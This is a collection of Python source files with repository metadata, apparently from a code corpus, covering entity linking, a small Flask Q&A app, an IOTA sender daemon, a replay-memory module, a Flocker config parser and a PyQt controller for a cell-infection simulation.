0\n for term in common_terms:\n df = len(index_ent[term])\n if df > fix_terms:\n continue # too common term\n idf = math.log10( (fix_terms + 1) / (df + 1) )\n total_idf += idf\n return total_idf\n\n# In[26]:\n\nfrom collections import defaultdict\ndata = defaultdict(list)\n\nid2mids = {}\nHITS_TOP_ENTITIES = 100\nfor i, lineid in enumerate(rel_lineids):\n if i % 10000 == 0:\n print(\"line {}\".format(i))\n\n truth_mid, truth_rel, question = id2question[lineid]\n queries = id2queries[lineid]\n if queries == None or len(queries) == 0:\n queries = [id2question[lineid]]\n C = []\n C_pruned = []\n C_tfidf_pruned = []\n\n for query in queries:\n query_text = query.lower() # lowercase the query\n query_tokens = tokenize_text(query_text)\n N = min(len(query_tokens), 3)\n # print(\"lineid: {}, query_text: {}, relation: {}\".format(lineid, query_text, pred_relation))\n # print(\"query_tokens: {}\".format(query_tokens))\n for n in range(N, 0, -1):\n ngrams_set = find_ngrams(query_tokens, n)\n # print(\"ngrams_set: {}\".format(ngrams_set))\n for ngram_tuple in ngrams_set:\n ngram = \" \".join(ngram_tuple)\n ngram = strip_accents(ngram)\n # unigram stopwords have too many candidates so just skip over\n if ngram in stopwords:\n continue\n # print(\"ngram: {}\".format(ngram))\n try:\n cand_mids = index_ent[ngram] # search entities\n except:\n continue\n C.extend(cand_mids)\n # print(\"C: {}\".format(C))\n if (len(C) > 0):\n # print(\"early termination...\")\n break\n # print(\"C[:5]: {}\".format(C[:5]))\n\n for mid in set(C):\n if mid in index_reach.keys(): # PROBLEM: don't know why this may not exist??\n count_mid = C.count(mid) # count number of times mid appeared in C\n C_pruned.append((mid, count_mid))\n\n for mid, count_mid in C_pruned:\n if mid in index_names.keys():\n cand_ent_name = pick_best_name(question, index_names[mid])\n try:\n truth_name = pick_best_name(question, index_names[truth_mid])\n except:\n continue\n if cand_ent_name == truth_name: # if name is correct, we are good\n data['name_match_label'].append(1)\n else:\n data['name_match_label'].append(0)\n\n if mid == truth_mid:\n data['true_label'].append(1)\n else:\n data['true_label'].append(0)\n data['lineid'] = lineid\n data['query'] = query_text\n\n data['length_name'].append(len(tokenize_text(cand_ent_name)))\n data['length_question'].append(len(tokenize_text(question)))\n data['length_query'].append(len(query_tokens))\n data['tf'].append(count_mid)\n data['idf'].append(calc_idf(question, cand_ent_name, index_ent))\n data['sques'].append(fuzz.ratio(cand_ent_name, question)/100.0)\n data['squer'].append(fuzz.ratio(cand_ent_name, query_text)/100.0)\n data['pques'].append(fuzz.partial_ratio(cand_ent_name, question)/100.0)\n data['pquer'].append(fuzz.partial_ratio(cand_ent_name, query_text)/100.0)\n\n C_tfidf_pruned.append((mid, cand_ent_name, data))\n # print(\"C_tfidf_pruned[:10]: {}\".format(C_tfidf_pruned[:10]))\n\n if len(C_tfidf_pruned) == 0:\n continue\n\n id2mids[lineid] = C_tfidf_pruned\n\nprint(\"done\")\n\n\n\ndf = pd.DataFrame(data)\ndf.to_pickle('df_valid_linking.pkl')\n\ny = df['true_label']\nprint(y.head())\nX = df.drop('true_label', axis=1)\n#print(X.head())\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression(C=0.1)\nlr.fit(X, y)\n\nprint(lr.score(X, y))\nprint(lr.coef_)\nprint(lr.intercept_)\n\n#with open('linking_lr.pkl', 'wb') as f:\n# pickle.dump(lr, f)\n\n\n\n","sub_path":"ferhan_simple_qa_rnn/entity_linking/cross_linking_data.py","file_name":"cross_linking_data.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"483439050","text":"from flask import Flask, render_template, json, request,redirect,session,jsonify\nimport utils\n\napp = Flask(__name__)\napp.secret_key = 'why would I tell you my secret key?'\n\n@app.route('/')\ndef main():\n return render_template('index.html')\n\n@app.route('/save', methods=['POST','GET'])\ndef Save():\n session['query'] = request.form['inputName']\n return redirect('/')\n\n@app.route('/AskMe', methods=['POST','GET'])\ndef AskMe():\n # return render_template('answer.html')\n # _question = request.form['inputName']\n # answer = utils.query_string_direct(_question)\n # return redirect('/')\n # return render_template('signup.html')\n query = ''\n if session.get('query'):\n query = session.get('query')\n try:\n # validate the received values\n if query != '':\n # All Good, let's call MySQL\n answer = utils.get_query_results(query)\n return json.dumps(answer)\n else:\n return json.dumps({'html':'Enter the required fields'})\n except Exception as e:\n return json.dumps({'error':str(e)})\n\nif __name__ == \"__main__\":\n app.run(port=5002)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225704875","text":"'''\nmaster sender background task (daemon)\nIt starts senders for each sequences in config file as child processes\nexits if any of them exists\n'''\nimport logging\nimport time\nimport sys\nimport traceback\nimport os\nimport multiprocessing as mp\n\nfrom misc import param, get_sequences, git_short_hash, DelayObj\nfrom misc import refresh_recent_history, connect, record_current_environ_obj, call_stats_cleanup\nfrom sender_lib import sender_proc\n\nfrom logging.handlers import TimedRotatingFileHandler\n\nlogger = mp.get_logger()\n\n\ndef config_logging(level, logger):\n logger.setLevel(level)\n logging.Formatter.converter = time.gmtime # https://stackoverflow.com/questions/6321160/python-logging-how-to-set-time-to-gmt\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s - %(module)s - %(message)s'))\n logger.addHandler(consoleHandler)\n\n fname = \"sender_master.log\"\n # rotating file log doesn't work with multiprocessing\n # fileHandler = TimedRotatingFileHandler(\n # param(\"site_data_dir\", \"log_path\") + fname,\n # delay=True,\n # when=\"midnight\",\n # interval=1,\n # utc=True,\n # backupCount=5,\n # encoding=\"utf8\",\n # )\n fileHandler = logging.FileHandler(param(\"site_data_dir\", \"log_path\") + fname)\n fileHandler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s - %(module)s - %(message)s'))\n logger.addHandler(fileHandler)\n logger.info(\"Master log file is {}\".format(fname))\n\nconfig_logging(logging.DEBUG, logger)\n\ndef record_current_environment():\n env_dict = dict(\n num_sequences=len(get_sequences()),\n active_senders=sorted([p.name for p in mp.active_children()])\n )\n record_current_environ_obj(connect(), env_dict)\n return env_dict\n\n\ndef main(seq_list):\n logger.info(\"Starting Traveling IOTA SENDER master process for sequences: {}\".format(str(seq_list)))\n logger.info(\"Git commit short hash: {}\".format(git_short_hash))\n logger.info(\"Default IOTA node: {}\".format(param(\"iota_node\")))\n # load_iri_version()\n\n logger.info(\"Master sender process pid={pid}\".format(\n pid=os.getpid()\n ))\n\n connect()\n\n # refresh since beginning\n refresh_recent_history(connect(), None)\n\n mp.set_start_method(\"spawn\")\n\n init_lock = mp.Lock() # to synchronize initialization of senders to avoid db locks\n start_event = mp.Event()\n\n for _seq in seq_list:\n p = mp.Process(target=sender_proc, args=(_seq, init_lock, start_event), name=_seq, daemon=True)\n p.start()\n\n logger.info(\"MASTER: wait 1 min for child processes to unwrap....\")\n time.sleep(60) # wait startup time\n logger.info(\"MASTER: finish init phase, send start signal\")\n start_event.set()\n count_call_stats_cleanup = 0\n try:\n delayObj = DelayObj()\n while True:\n delayObj.holdon(15)\n\n env = record_current_environment()\n refresh_recent_history(connect(), 5) # five minutes back\n\n if count_call_stats_cleanup % 100 == 0:\n call_stats_cleanup(connect())\n count_call_stats_cleanup += 1\n\n active_senders = env[\"active_senders\"]\n msg = \"Sender master: {num} active senders: {lst}\".format(\n num=len(active_senders),\n lst=str(active_senders)\n )\n logger.info(msg)\n if len(active_senders) != env[\"num_sequences\"]:\n logger.error(\"!!!!!!! Not all senders are active: leaving master process...\")\n sys.exit(\"--------- Master sender process stopped\")\n\n except KeyboardInterrupt:\n logger.info(\"Master sender process interrupted by keyboard\")\n logger.info(\"Leaving master process..\")\n\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n tb_formatted = \"\".join(traceback.format_exception(exc_type, exc_value, exc_traceback))\n\n logger.error(tb_formatted)\n logger.critical(\"!!!!!!!!! Leaving master sender process..\")\n sys.exit(\"Master sender stopped\")\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n\n parser = ArgumentParser()\n parser.add_argument(\"--seq\", \"-s\", type=str, help=\"Sequence name\")\n args = parser.parse_args()\n seq_list = sorted(get_sequences())\n if args.seq:\n seq = args.seq.upper()\n if seq not in seq_list:\n sys.exit(\"Letter '{}' doesn't represent enabled sequence\".format(seq))\n else:\n seq_list = [seq]\n\n main(seq_list)\n\n","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"605065747","text":"import torch\nimport numpy as np\nfrom np.random import choice \n\n\n\"\"\"\nThe need for MemoryV2 is due to the following reasons:\n1 > The original experience replay did not account for the termination of the\n episodes. This kind of creates a poblem in our case! Where the goal state \n might be quite different, based on the initial state of the env.\n\n2 > .. ?\n\nThe changes that this structure brings is:\n1 > Memory is a list of episodes and episodes is a list of experiences.\n2 > During sampling, to make it easier for the integration part, make sure to\n sample sequences of len 'chunk_size' only. Nothing less!\n\nv1 contructor inputs:\n size, symbolic_env, observation_size, action_size, bit_depth, device\n\"\"\"\n\n\ndef postprocess_img(image, depth):\n \"\"\"\n Postprocess an image observation for storage.\n From float32 numpy array [-0.5, 0.5] to uint8 numpy array [0, 255])\n \"\"\"\n image = np.floor((image + 0.5) * 2 ** depth)\n return np.clip(image * 2**(8 - depth), 0, 2**8 - 1).astype(np.uint8)\n\n\ndef preprocess_img(image, depth):\n \"\"\"\n Preprocesses an observation inplace.\n From float32 Tensor [0, 255] to [-0.5, 0.5]\n \"\"\"\n image.div_(2 ** (8 - depth)).floor_().div_(2 ** depth).sub_(0.5)\n image.add_(torch.rand_like(image).div_(2 ** depth))\n\n\nclass Memory:\n def __init__(self, size, _, observation_size, action_size, bit_depth, device):\n self.device = device\n self.action_size = action_size\n self.observation_size = observation_size\n self.data = deque(maxlen=size)\n self.episode = None\n\n @property\n def size(self):\n return len(self.data)\n\n def start_episode(self, obs):\n if self.episode is not None and isinstance(self.episode, Episode):\n self.data.append(self.episode)\n self.episode = Episode(device, bit_depth)\n self.episode.append_just_obs(obs)\n \n def append(self, obs, u, r, d):\n self.episode.append(obs, u, r, d)\n\n def sample(self, batch_size, tracelen):\n \"\"\"\n Make sure to include only episodes with length >= tracelen\n \"\"\"\n episode_idx = choice(self.size, batch_size)\n init_st_idx = [choice(self.data[i].size - tracelen) for i in episode_idx]\n R = torch.zeros((batch_size, tracelen)).to(device)\n D = torch.zeros((batch_size, tracelen)).to(device)\n U = torch.zeros((batch_size, tracelen, *self.action_size)).to(device)\n X = torch.zeros((batch_size, tracelen, *self.observation_size)).to(device)\n for n, (i, s) in enumerate(zip(episode_idx, init_st_idx)):\n X[n], U[n], R[n], D[n] = self.data[i].prepare(s, s + tracelen)\n return data\n\n\nclass Episode:\n def __init__(self, device, bit_depth):\n self.device = device\n self.bit_depth = bit_depth\n self.clear()\n\n @property\n def size(self):\n return self._size\n\n def clear(self):\n self.x = []\n self.u = []\n self.d = []\n self.r = []\n self._size = 0\n\n def append(self, x, u, r, d):\n self._size += 1\n self.x.append(postprocess_img(x.numpy(), self.bit_depth))\n self.u.append(u.numpy())\n self.r.append(r)\n self.d.append(d)\n\n def append_just_obs(self, x):\n self.x.append(postprocess_img(x.numpy(), self.bit_depth))\n\n def prepare(self, s=0, e=None):\n e = e or self.size\n prossx = torch.tensor(self.x[s:e+1], dtype=F32, device=self.device)\n preprocess_img(prossx, self.bit_depth),\n return (\n prossx,\n torch.tensor(self.u[s:e], dtype=F32, device=self.device),\n torch.tensor(self.r[s:e], dtype=F32, device=self.device),\n torch.tensor(self.d[s:e], dtype=F32, device=self.device),\n )\n","sub_path":"memory_v2.py","file_name":"memory_v2.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"174516542","text":"# Copyright Hybrid Logic Ltd. See LICENSE file for details.\n# -*- test-case-name: flocker.node.test.test_config -*-\n\n\"\"\"\nAPIs for parsing and validating configuration.\n\"\"\"\n\nfrom __future__ import unicode_literals, absolute_import\n\nimport os\nimport yaml\n\nfrom twisted.python.filepath import FilePath\n\nfrom ._model import (\n Application, AttachedVolume, Deployment,\n DockerImage, Node, Port\n)\n\n\nclass ConfigurationError(Exception):\n \"\"\"\n Some part of the supplied configuration was wrong.\n\n The exception message will include some details about what.\n \"\"\"\n\n\nclass Configuration(object):\n \"\"\"\n Validate and parse configurations.\n \"\"\"\n def __init__(self, lenient=False):\n \"\"\"\n :param bool lenient: If ``True`` don't complain about certain\n deficiencies in the output of ``flocker-reportstate``, In\n particular https://github.com/ClusterHQ/flocker/issues/289 means\n the mountpoint is unknown.\n \"\"\"\n self._lenient = lenient\n\n def _applications_from_configuration(self, application_configuration):\n \"\"\"\n Validate and parse a given application configuration.\n\n :param dict application_configuration: The intermediate configuration\n representation to load into ``Application`` instances. See\n :ref:`Configuration` for details.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``dict`` mapping application names to ``Application``\n instances.\n \"\"\"\n if u'applications' not in application_configuration:\n raise ConfigurationError(\"Application configuration has an error. \"\n \"Missing 'applications' key.\")\n\n if u'version' not in application_configuration:\n raise ConfigurationError(\"Application configuration has an error. \"\n \"Missing 'version' key.\")\n\n if application_configuration[u'version'] != 1:\n raise ConfigurationError(\"Application configuration has an error. \"\n \"Incorrect version specified.\")\n\n applications = {}\n for application_name, config in (\n application_configuration['applications'].items()):\n try:\n image_name = config.pop('image')\n except KeyError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Missing value for '{message}'.\").format(\n application_name=application_name, message=e.message)\n )\n\n try:\n image = DockerImage.from_string(image_name)\n except ValueError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Invalid Docker image name. {message}\").format(\n application_name=application_name, message=e.message)\n )\n\n ports = []\n try:\n for port in config.pop('ports', []):\n try:\n internal_port = port.pop('internal')\n except KeyError:\n raise ValueError(\"Missing internal port.\")\n try:\n external_port = port.pop('external')\n except KeyError:\n raise ValueError(\"Missing external port.\")\n\n if port:\n raise ValueError(\n \"Unrecognised keys: {keys}.\".format(\n keys=', '.join(sorted(port.keys()))))\n ports.append(Port(internal_port=internal_port,\n external_port=external_port))\n except ValueError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Invalid ports specification. {message}\").format(\n application_name=application_name, message=e.message))\n\n volume = None\n if \"volume\" in config:\n try:\n configured_volume = config.pop('volume')\n try:\n mountpoint = configured_volume['mountpoint']\n except TypeError:\n raise ValueError(\n \"Unexpected value: \" + str(configured_volume)\n )\n except KeyError:\n raise ValueError(\"Missing mountpoint.\")\n\n if not (self._lenient and mountpoint is None):\n if not isinstance(mountpoint, str):\n raise ValueError(\n \"Mountpoint {path} contains non-ASCII \"\n \"(unsupported).\".format(\n path=mountpoint\n )\n )\n if not os.path.isabs(mountpoint):\n raise ValueError(\n \"Mountpoint {path} is not an absolute path.\"\n .format(\n path=mountpoint\n )\n )\n configured_volume.pop('mountpoint')\n if configured_volume:\n raise ValueError(\n \"Unrecognised keys: {keys}.\".format(\n keys=', '.join(sorted(\n configured_volume.keys()))\n ))\n mountpoint = FilePath(mountpoint)\n\n volume = AttachedVolume(\n name=application_name,\n mountpoint=mountpoint\n )\n except ValueError as e:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config \"\n \"error. Invalid volume specification. {message}\")\n .format(\n application_name=application_name,\n message=e.message\n )\n )\n\n applications[application_name] = Application(\n name=application_name,\n image=image,\n volume=volume,\n ports=frozenset(ports))\n\n if config:\n raise ConfigurationError(\n (\"Application '{application_name}' has a config error. \"\n \"Unrecognised keys: {keys}.\").format(\n application_name=application_name,\n keys=', '.join(sorted(config.keys())))\n )\n return applications\n\n def _deployment_from_configuration(self, deployment_configuration,\n all_applications):\n \"\"\"\n Validate and parse a given deployment configuration.\n\n :param dict deployment_configuration: The intermediate configuration\n representation to load into ``Node`` instances. See\n :ref:`Configuration` for details.\n\n :param set all_applications: All applications which should be running\n on all nodes.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``set`` of ``Node`` instances.\n \"\"\"\n if 'nodes' not in deployment_configuration:\n raise ConfigurationError(\"Deployment configuration has an error. \"\n \"Missing 'nodes' key.\")\n\n if u'version' not in deployment_configuration:\n raise ConfigurationError(\"Deployment configuration has an error. \"\n \"Missing 'version' key.\")\n\n if deployment_configuration[u'version'] != 1:\n raise ConfigurationError(\"Deployment configuration has an error. \"\n \"Incorrect version specified.\")\n\n nodes = []\n for hostname, application_names in (\n deployment_configuration['nodes'].items()):\n if not isinstance(application_names, list):\n raise ConfigurationError(\n \"Node {node_name} has a config error. \"\n \"Wrong value type: {value_type}. \"\n \"Should be list.\".format(\n node_name=hostname,\n value_type=application_names.__class__.__name__)\n )\n node_applications = []\n for name in application_names:\n application = all_applications.get(name)\n if application is None:\n raise ConfigurationError(\n \"Node {hostname} has a config error. \"\n \"Unrecognised application name: \"\n \"{application_name}.\".format(\n hostname=hostname, application_name=name)\n )\n node_applications.append(application)\n node = Node(hostname=hostname,\n applications=frozenset(node_applications))\n nodes.append(node)\n return set(nodes)\n\n def model_from_configuration(self, application_configuration,\n deployment_configuration):\n \"\"\"\n Validate and coerce the supplied application configuration and\n deployment configuration dictionaries into a ``Deployment`` instance.\n\n :param dict application_configuration: Map of applications to Docker\n images.\n\n :param dict deployment_configuration: Map of node names to application\n names.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``Deployment`` object.\n \"\"\"\n applications = self._applications_from_configuration(\n application_configuration)\n nodes = self._deployment_from_configuration(\n deployment_configuration, applications)\n return Deployment(nodes=frozenset(nodes))\n\n\nmodel_from_configuration = Configuration().model_from_configuration\n\n\ndef current_from_configuration(current_configuration):\n \"\"\"\n Validate and coerce the supplied current cluster configuration into a\n ``Deployment`` instance.\n\n The passed in configuration is the aggregated output of\n ``configuration_to_yaml`` as combined by ``flocker-deploy``.\n\n :param dict current_configuration: Map of node names to list of\n application maps.\n\n :raises ConfigurationError: if there are validation errors.\n\n :returns: A ``Deployment`` object.\n \"\"\"\n configuration = Configuration(lenient=True)\n nodes = []\n for hostname, applications in current_configuration.items():\n node_applications = configuration._applications_from_configuration(\n applications)\n nodes.append(Node(hostname=hostname,\n applications=frozenset(node_applications.values())))\n return Deployment(nodes=frozenset(nodes))\n\n\ndef configuration_to_yaml(applications):\n \"\"\"\n Generate YAML representation of a node's applications.\n\n A bunch of information is missing, but this is sufficient for the\n initial requirement of determining what to do about volumes when\n applying configuration changes.\n https://github.com/ClusterHQ/flocker/issues/289\n\n :param applications: ``list`` of ``Application``\\ s, typically the\n current configuration on a node as determined by\n ``Deployer.discover_node_configuration()``.\n\n :return: YAML serialized configuration in the application\n configuration format.\n \"\"\"\n result = {}\n for application in applications:\n # XXX image unknown, see\n # https://github.com/ClusterHQ/flocker/issues/207\n result[application.name] = {\"image\": \"unknown\"}\n ports = []\n for port in application.ports:\n ports.append(\n {'internal': port.internal_port,\n 'external': port.external_port}\n )\n result[application.name][\"ports\"] = ports\n if application.volume:\n # Until multiple volumes are supported, assume volume name\n # matches application name, see:\n # https://github.com/ClusterHQ/flocker/issues/49\n result[application.name][\"volume\"] = {\n \"mountpoint\": None,\n }\n return yaml.safe_dump({\"version\": 1, \"applications\": result})\n","sub_path":"flocker/node/_config.py","file_name":"_config.py","file_ext":"py","file_size_in_byte":12793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"122533130","text":"from PyQt4 import QtCore, QtGui\nfrom Logger import GUIConsoleLogger as Log\n\nimport Config\nimport time\n\nfrom SimulationVisualization import SimVis\nimport Worldspace\nimport Program\n\nimport sys\n\n\"\"\"\nAuthor(s): Steven Beard\nLast Modified: 28/3/2014\n\"\"\"\n\nclass UIController :\n \"\"\"\n UI Controller for the user interface to implement system behaviours triggered by user input\n Main purpose is for the user to modify the config file values and to run/pause/stop/close the simulation/program (also can reset config to defaults)\n \"\"\"\n def __init__(self, program, simvis, queue):\n \"\"\"\n Constructor\n \"\"\"\n self.program = program\n self.simVis = simvis\n self.q = queue\n self.program.setUIController(self)\n self.setSimRunning(False)\n\n self.config = Config.ConfigReader()\n self.settings = self.config.Read(False)\n\n def setSimRunning(self, bool):\n \"\"\"\n Set whether the simulation is currently running\n \"\"\"\n self.running = bool\n #print(\"running = \" + str(self.running))\n\n def setupStartButton(self) :\n \"\"\"\n Set the start button behaviour - start the simulation/program if it is not already running\n \"\"\"\n if(self.running) :\n return # dont start another sumulation if already running\n\n #clear the console (and deactivate it - stop scrolling and copying etc - temporary)\n self.console.setEnabled(False)\n self.console.clear()\n\n #update the config file with the values contained by the UI element parameter values\n try :\n self.updateConfig()\n self.settings = self.config.Read(True)\n except Exception as e:\n Log.err(e.message)\n return\n\n self.setSimRunning(True)\n\n #initialize the simulation visualizaion\n if SimVis.ENABLED and self.program.paused == False:\n if SimVis.SNAPSHOT_ENABLED:\n width = SimVis.SNAPSHOT_WIDTH if SimVis.SNAPSHOT_WIDTH <= Worldspace.GRID_WIDTH else Worldspace.GRID_WIDTH\n height = SimVis.SNAPSHOT_HEIGHT if SimVis.SNAPSHOT_HEIGHT <= Worldspace.GRID_HEIGHT else Worldspace.GRID_HEIGHT\n\n #simVis = SimVis(width, height, SimVis.SQUARESIZE) # snapshot\n self.simVis.createWindow(width, height, self.simVis.SQUARESIZE)\n else:\n #simVis = SimVis(Worldspace.GRID_WIDTH, Worldspace.GRID_HEIGHT, SimVis.SQUARESIZE) # full sim size\n self.simVis.createWindow(Worldspace.GRID_WIDTH, Worldspace.GRID_HEIGHT, self.simVis.SQUARESIZE)\n self.simVis.setTimeMeasurement(\"hours\")\n self.simVis.setTimeStepsInMeasurement(6.0)\n\n # start the simulation/program\n self.program.run(self.settings)\n\n #thread.start_new_thread(self.program.run, (self.settings,))\n\n # listen for events triggered by the program thread executed sequencially using a queue\n while self.running:\n #print(\"running = \" + str(self.running))\n # now the main thread doesn't care what function it's executing.\n # previously it assumed it was sending the message to display().\n try :\n f, args, kwargs = self.q.get_nowait()\n f(*args, **kwargs)\n self.q.task_done()\n except :\n time.sleep(0.5)\n #print(\"finished\")\n\n self.console.setEnabled(True)\n\n def setupStopButton(self) :\n \"\"\"\n Set the stop button behaviour - stop the simulation program\n \"\"\"\n self.program.stop()\n\n def setupDefaultsButton(self) :\n \"\"\"\n Set the defaults button behaviour - reset the config file to system defaults and update the ui elements accordingly\n \"\"\"\n self.config.reconstruct()\n self.settings = self.config.Read(True)\n self.updateUIParameters()\n\n def setupPauseButton(self) :\n \"\"\"\n Set the pause button behaviour - pause the simulation program\n \"\"\"\n self.program.pause()\n\n def setupCloseButton(self) :\n \"\"\"\n Set the close button behaviour - close the UI/program\n \"\"\"\n sys.exit(0)\n\n def UIinitComplete(self) :\n \"\"\"\n Notification that the UI has finished initializing\n \"\"\"\n return\n\n def updateConfig(self) :\n \"\"\"\n Update the config file based on the current UI element values\n \"\"\"\n b = True\n i = 0\n f = 0.0\n\n i = int(str(self.numberOfRunsTextBox.text()))\n self.settings[\"General\"][\"iNumberOfRuns\"] = i\n b = self.debugTextCheckBoxTrue.isChecked()\n self.settings[\"General\"][\"bDebugTextEnabled\"] = b\n i = int(str(self.runTimeTextBox.text()))\n self.settings[\"General\"][\"iRunTime\"] = i\n\n i = int(str(self.gridWidthTextBox.text()))\n self.settings[\"World\"][\"iGridWidth\"] = i\n i = int(str(self.gridHeightTextBox.text()))\n self.settings[\"World\"][\"iGridHeight\"] = i\n b = self.isToroidalCheckBoxTrue.isChecked()\n self.settings[\"World\"][\"bIsToroidal\"] = b\n\n\n b = self.regenCheckBoxTrue.isChecked()\n self.settings[\"EpithelialSystem\"][\"bRegenEnabled\"] = b\n f = float(str(self.infectInitTextBox.text()))\n self.settings[\"EpithelialSystem\"][\"fInfectInit\"] = f\n b = self.randomAgeCheckBoxTrue.isChecked()\n self.settings[\"EpithelialSystem\"][\"bRandomAge\"] = b\n\n f = float(str(self.infectRateTextBox.text()))\n self.settings[\"EpithelialCell\"][\"fInfectRate\"] = f\n i = int(str(self.divisionTimeTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iDivisionTime\"] = i\n i = int(str(self.infectDelayTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iInfectDelay\"] = i\n i = int(str(self.expressDelayTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iExpressDelay\"] = i\n i = int(str(self.eCellLifespanTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iEpithelialLifespan\"] = i\n i = int(str(self.infectLifespanTextBox.text()))\n self.settings[\"EpithelialCell\"][\"iInfectLifespan\"] = i\n\n #b = self.focusDebugTextCheckBoxTrue.isChecked()\n #self.settings[\"FocusSystem\"][\"bDebugTextEnabled\"] = b\n i = int(str(self.mergeCollisionsTextBox.text()))\n self.settings[\"FocusSystem\"][\"iCollisionsForMergePercentage\"] = i\n b = self.focusSysEnabledCheckBoxTrue.isChecked()\n self.settings[\"FocusSystem\"][\"bIsEnabled_FocusSys\"] = b\n\n f = float(str(self.baseImmCellsTextBox.text()))\n self.settings[\"ImmuneSystem\"][\"fBaseImmCell\"] = f\n f = float(str(self.recruitmentTextBox.text()))\n self.settings[\"ImmuneSystem\"][\"fRecruitment\"] = f\n i = int(str(self.recruitDelayTextBox.text()))\n self.settings[\"ImmuneSystem\"][\"iRecruitDelay\"] = i\n b = self.immSysEnabledCheckBoxTrue.isChecked()\n self.settings[\"ImmuneSystem\"][\"bIsEnabled_ImmSys\"] = b\n\n i = int(self.immCellLifespanTextBox.text())\n self.settings[\"ImmuneCell\"][\"iImmuneLifespan\"] = i\n\n i = int(str(self.snapshotWidthTextBox.text()))\n self.settings[\"SimulationVisualisation\"][\"iSnapshotWidth\"] = i\n i = int(str(self.snapshotHeightTextBox.text()))\n self.settings[\"SimulationVisualisation\"][\"iSnapshotHeight\"] = i\n i = int(str(self.squareSizeTextBox.text()))\n self.settings[\"SimulationVisualisation\"][\"iSquareSize\"] = i\n #b = self.focusIdsCheckBoxTrue.isChecked()\n #self.settings[\"SimulationVisualisation\"][\"bDebugFocusIdEnabled\"] = b\n b = self.snapshotEnabledCheckBoxTrue.isChecked()\n self.settings[\"SimulationVisualisation\"][\"bSnapshotEnabled\"] = b\n b = self.simVisEnabledCheckBoxTrue.isChecked()\n self.settings[\"SimulationVisualisation\"][\"bIsEnabled_SimVis\"] = b\n #b = self.highlightCollisionsCheckBoxTrue.isChecked()\n #self.settings[\"SimulationVisualisation\"][\"bHighlightCollisions\"] = b\n\n b = self.showGraphCheckBoxTrue.isChecked()\n self.settings[\"Graph\"][\"bShowGraphOnFinish\"] = b\n\n\n self.config.updateConfigFile(self.settings)\n\n\n def updateUIParameters(self) :\n \"\"\"\n Update all of the UI elements based on current config file values\n \"\"\"\n self.setNumberOfRuns()\n self.setDebugTextEnabled()\n self.setRunTime()\n self.setGridWidth()\n self.setGridHeight()\n self.setIsToroidal()\n self.setRegenEnabled()\n self.setRandomAgeEnabled()\n self.setInfectInit()\n self.setInfectRate()\n self.setDivisionTime()\n self.setExpressDelay()\n self.setECellLifespan()\n self.setInfectLifespan()\n #self.setFocusDebugTextEnabled()\n self.setMergeCollisions()\n self.setFocusSysEnabled()\n self.setBaseImmCells()\n self.setRecruitment()\n self.setRecruitDelay()\n self.setImmSysEnabled()\n self.setImmCellLifespan()\n self.setSnapshotWidth()\n self.setSnapshotHeight()\n self.setSquareSize()\n #self.setFocusIds()\n self.setSnapshotEnabled()\n self.setSimVisEnabled()\n #self.setHighlightCollisions()\n self.setShowGraph()\n\n\n\n\n \"\"\"\n The Following Methods:\n 1. Setting the listeners for UI elements (text/number inputs for parameters or parameter checkboxes).\n 2. Updating the UI elements based on current config file values\n \"\"\"\n\n def setNumberOfRunsInput(self, textbox) :\n self.numberOfRunsTextBox = textbox\n self.setNumberOfRuns()\n\n def setNumberOfRuns(self) :\n value = self.settings[\"General\"][\"iNumberOfRuns\"]\n self.numberOfRunsTextBox.setText(str(value))\n\n def setDebugTextEnabledCheckBox(self, checkboxTrue, checkboxFalse) :\n self.debugTextCheckBoxTrue = checkboxTrue\n self.debugTextCheckBoxFalse = checkboxFalse\n self.setDebugTextEnabled()\n\n def setDebugTextEnabled(self) :\n isOn = self.settings[\"General\"][\"bDebugTextEnabled\"]\n self.debugTextCheckBoxTrue.setChecked(isOn)\n self.debugTextCheckBoxFalse.setChecked((isOn == False))\n\n def setRunTimeInput(self, textbox) :\n self.runTimeTextBox = textbox\n self.setRunTime()\n\n def setRunTime(self) :\n value = self.settings[\"General\"][\"iRunTime\"]\n self.runTimeTextBox.setText(str(value))\n\n def setGridWidthInput(self, textbox) :\n self.gridWidthTextBox = textbox\n self.setGridWidth()\n\n def setGridWidth(self) :\n value = self.settings[\"World\"][\"iGridWidth\"]\n self.gridWidthTextBox.setText(str(value))\n\n def setGridHeightInput(self, textbox) :\n self.gridHeightTextBox = textbox\n self.setGridHeight()\n\n def setGridHeight(self) :\n value = self.settings[\"World\"][\"iGridHeight\"]\n self.gridHeightTextBox.setText(str(value))\n\n def setIsToroidalCheckBox(self, checkboxTrue, checkboxFalse) :\n self.isToroidalCheckBoxTrue = checkboxTrue\n self.isToroidalCheckBoxFalse = checkboxFalse\n self.setIsToroidal()\n\n def setIsToroidal(self) :\n isOn = self.settings[\"World\"][\"bIsToroidal\"]\n self.isToroidalCheckBoxTrue.setChecked(isOn)\n self.isToroidalCheckBoxFalse.setChecked((isOn == 